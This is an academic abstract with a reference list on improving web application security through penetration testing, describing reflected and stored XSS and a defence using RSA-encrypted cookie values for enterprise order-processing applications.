Improving Web Application Security Using Penetration Testing

The main issues of current web application is easily hacking the user information by unauthorized person. The development of entire web application depends on scripting languages that easily displays the user authentication code to the web browser. All code must be transferred through query string parameter (URL) of the web application. This kind of application security fails when verifying it by penetration testing which is based on XSS languages. This study overcomes the security issues by developing a web application based on cross site scripting technique which the user codes are encrypted using RSA algorithm and cookies, cross domain verification based on encrypted use code. XSS vulnerabilities come in different forms and may be categorized into two varieties: reflected and stored. Reflected is on type of attack which can be performed against applications that employ a dynamic page error message to users. Stored XSS vulnerability appears when data submitted by one user is store in the application or in the back-end database. The user cookies of the web browser store only the encrypted key values. These techniques applied in Enterprise web application it support multiple organization for processing product purchase order, sales order and invoice details.

[1]  Alessandro Orso,et al.  AMNESIA: analysis and monitoring for NEutralizing SQL-injection attacks , 2005, ASE.

[2]  Chong Fu,et al.  An Efficient Implementation of RSA Digital Signature Algorithm , 2008 .

[3]  R. K. Pateriya,et al.  A Proposed Algorithm to improve security & Efficiency of SSL-TLS servers using Batch RSA decryption , 2009, ArXiv.

[4]  Alessandro Orso,et al.  Improving test case generation for web applications using automated interface discovery , 2007, ESEC-FSE '07.

[5]  Alessandro Orso,et al.  Penetration Testing with Improved Input Vector Identification , 2009, 2009 International Conference on Software Testing Verification and Validation.

[6]  Xiaohong Yuan,et al.  An Overview of Penetration Testing , 2011 .

[7]  Gary McGraw,et al.  Software Security: Building Security In , 2006, 2006 17th International Symposium on Software Reliability Engineering.

[8]  Wei Qi Yan,et al.  An Overview of Penetration Testing , 2014, Int. J. Digit. Crime Forensics.

[9]  Zhendong Su,et al.  The essence of command injection attacks in web applications , 2006, POPL '06.

[10]  Nicolae Tapus,et al.  Guidelines for Discovering and Improving Application Security , 2013, 2013 19th International Conference on Control Systems and Computer Science.

[11]  Franck Lebeau,et al.  Model-Based Vulnerability Testing for Web Applications , 2013, 2013 IEEE Sixth International Conference on Software Testing, Verification and Validation Workshops.

[12]  Tadeusz Pietraszek,et al.  Defending Against Injection Attacks Through Context-Sensitive String Evaluation , 2005, RAID.

[13]  Alessandro Orso,et al.  WASP: Protecting Web Applications Using Positive Tainting and Syntax-Aware Evaluation , 2008, IEEE Transactions on Software Engineering.